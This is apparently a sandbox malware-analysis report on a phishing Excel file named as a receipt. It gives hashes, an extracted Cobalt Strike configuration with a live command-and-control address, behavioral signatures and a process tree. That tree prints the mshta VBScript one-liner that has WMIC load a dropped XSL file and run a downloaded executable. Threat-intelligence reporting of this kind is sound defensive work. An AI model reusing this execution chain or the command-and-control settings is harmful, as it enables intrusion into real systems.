Reciept 0198478.xlsb

General
Target

Reciept 0198478.xlsb

Filesize

67KB

Completed

06-07-2021 15:41

Score
10/10
MD5

16b275e48c1d27c448b4ed772206315c

SHA1

317988ea2f7fa8fa288850adce94bf2543bbd8d0

SHA256

d032d57e8f366c59979f536722b5cfbded08b94fc032da27220df46dfcd43208

Malware Config

Extracted

Family cobaltstrike
Botnet 1359593325
C2

http://94.198.40.11:80/visit.js

Attributes
access_type
512
host
94.198.40.11,/visit.js
http_header1
AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_header2
AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_method1
GET
http_method2
POST
polling_time
60000
port_number
80
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHFcV/jTWIWbMLGsg/xD3cCk0yHN+dWUBeSAZEdvXFEiawkFkWyJWyGyT0NbgSrwHmz+krYJY6l6YOoUNPWMNc6YpuQUYrBiilMX6rDkmmqUqem2tP6G4E6nBva8DOwNu671c8iFZeK4M8s6PPnUDuEuSHchHBLc5wV6Ew7BLO5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
4096
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
uri
/submit.php
user_agent
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
watermark
1359593325
Signatures 13

Filter: none

Defense Evasion
Discovery
  • Cobaltstrike

    Description

    Detected malicious payload which is part of Cobaltstrike.

  • CryptOne packer

    Description

    Detects CryptOne packer defined in NCC blogpost.

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x00030000000130db-66.datcryptone
  • Blocklisted process makes network request
    WMIC.exe

    Reported IOCs

    flowpidprocess
    6932WMIC.exe
  • Downloads MZ/PE file
  • Executes dropped EXE
    e15k9.exe

    Reported IOCs

    pidprocess
    1052e15k9.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry
    EXCEL.EXE

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessorEXCEL.EXE
  • Modifies Internet Explorer settings
    EXCEL.EXEmshta.EXE

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"EXCEL.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"EXCEL.EXE
    Key created\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Mainmshta.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"EXCEL.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"EXCEL.EXE
    Key created\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNoteEXCEL.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"EXCEL.EXE
    Key created\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft ExcelEXCEL.EXE
    Key created\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\ToolbarEXCEL.EXE
    Key created\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExtEXCEL.EXE
  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    pidprocess
    304EXCEL.EXE
  • Suspicious use of AdjustPrivilegeToken
    WMIC.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeIncreaseQuotaPrivilege932WMIC.exe
    Token: SeSecurityPrivilege932WMIC.exe
    Token: SeTakeOwnershipPrivilege932WMIC.exe
    Token: SeLoadDriverPrivilege932WMIC.exe
    Token: SeSystemProfilePrivilege932WMIC.exe
    Token: SeSystemtimePrivilege932WMIC.exe
    Token: SeProfSingleProcessPrivilege932WMIC.exe
    Token: SeIncBasePriorityPrivilege932WMIC.exe
    Token: SeCreatePagefilePrivilege932WMIC.exe
    Token: SeBackupPrivilege932WMIC.exe
    Token: SeRestorePrivilege932WMIC.exe
    Token: SeShutdownPrivilege932WMIC.exe
    Token: SeDebugPrivilege932WMIC.exe
    Token: SeSystemEnvironmentPrivilege932WMIC.exe
    Token: SeRemoteShutdownPrivilege932WMIC.exe
    Token: SeUndockPrivilege932WMIC.exe
    Token: SeManageVolumePrivilege932WMIC.exe
    Token: 33932WMIC.exe
    Token: 34932WMIC.exe
    Token: 35932WMIC.exe
    Token: SeIncreaseQuotaPrivilege932WMIC.exe
    Token: SeSecurityPrivilege932WMIC.exe
    Token: SeTakeOwnershipPrivilege932WMIC.exe
    Token: SeLoadDriverPrivilege932WMIC.exe
    Token: SeSystemProfilePrivilege932WMIC.exe
    Token: SeSystemtimePrivilege932WMIC.exe
    Token: SeProfSingleProcessPrivilege932WMIC.exe
    Token: SeIncBasePriorityPrivilege932WMIC.exe
    Token: SeCreatePagefilePrivilege932WMIC.exe
    Token: SeBackupPrivilege932WMIC.exe
    Token: SeRestorePrivilege932WMIC.exe
    Token: SeShutdownPrivilege932WMIC.exe
    Token: SeDebugPrivilege932WMIC.exe
    Token: SeSystemEnvironmentPrivilege932WMIC.exe
    Token: SeRemoteShutdownPrivilege932WMIC.exe
    Token: SeUndockPrivilege932WMIC.exe
    Token: SeManageVolumePrivilege932WMIC.exe
    Token: 33932WMIC.exe
    Token: 34932WMIC.exe
    Token: 35932WMIC.exe
  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    pidprocess
    304EXCEL.EXE
    304EXCEL.EXE
    304EXCEL.EXE
    304EXCEL.EXE
    304EXCEL.EXE
  • Suspicious use of WriteProcessMemory
    taskeng.exemshta.EXEWMIC.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1872 wrote to memory of 16521872taskeng.exemshta.EXE
    PID 1872 wrote to memory of 16521872taskeng.exemshta.EXE
    PID 1872 wrote to memory of 16521872taskeng.exemshta.EXE
    PID 1652 wrote to memory of 9321652mshta.EXEWMIC.exe
    PID 1652 wrote to memory of 9321652mshta.EXEWMIC.exe
    PID 1652 wrote to memory of 9321652mshta.EXEWMIC.exe
    PID 932 wrote to memory of 1052932WMIC.exee15k9.exe
    PID 932 wrote to memory of 1052932WMIC.exee15k9.exe
    PID 932 wrote to memory of 1052932WMIC.exee15k9.exe
    PID 932 wrote to memory of 1052932WMIC.exee15k9.exe
Processes 5
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Reciept 0198478.xlsb"
    Enumerates system info in registry
    Modifies Internet Explorer settings
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    PID:304
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {E9EE2BCF-C3B6-492F-9EFA-61190C2AE8AA} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
    Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Windows\system32\mshta.EXE
      C:\Windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qDialogSeriesAxes.xsl"" & Chr(34)),0:close")
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\System32\wbem\WMIC.exe
        "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qDialogSeriesAxes.xsl"
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:932
        • C:\Windows\Temp\e15k9.exe
          "C:\Windows\Temp\e15k9.exe"
          Executes dropped EXE
          PID:1052
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • C:\ProgramData\qDialogSeriesAxes.xsl

                        MD5

                        ed9a97566e5179a4793dad89b79f3c8b

                        SHA1

                        3aba6229322c12118a7999b35387045159429078

                        SHA256

                        c6ce5cf41a799c6c427a8facae15fa9ac40eb3562132189c72e1398178c74981

                        SHA512

                        08f827a3bea007feae33e69f43a09cfcb08f0f636d1eab3d937203bad63d94cd9f99312f162cefb1217e115d5ae3985b6202f2b773212134c540e01fe2d071f1

                      • C:\Windows\Temp\e15k9.exe

                        MD5

                        9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

                        SHA1

                        d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

                        SHA256

                        b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

                        SHA512

                        c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

                      • memory/304-59-0x000000002F911000-0x000000002F914000-memory.dmp

                      • memory/304-60-0x00000000716F1000-0x00000000716F3000-memory.dmp

                      • memory/304-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

                      • memory/932-63-0x0000000000000000-mapping.dmp

                      • memory/1052-65-0x0000000000000000-mapping.dmp

                      • memory/1052-70-0x0000000000400000-0x0000000000453000-memory.dmp

                      • memory/1052-67-0x0000000075971000-0x0000000075973000-memory.dmp

                      • memory/1052-68-0x00000000002C0000-0x00000000002F3000-memory.dmp

                      • memory/1052-69-0x0000000000220000-0x0000000000267000-memory.dmp

                      • memory/1052-71-0x0000000001D90000-0x0000000001DCD000-memory.dmp

                      • memory/1652-62-0x0000000000000000-mapping.dmp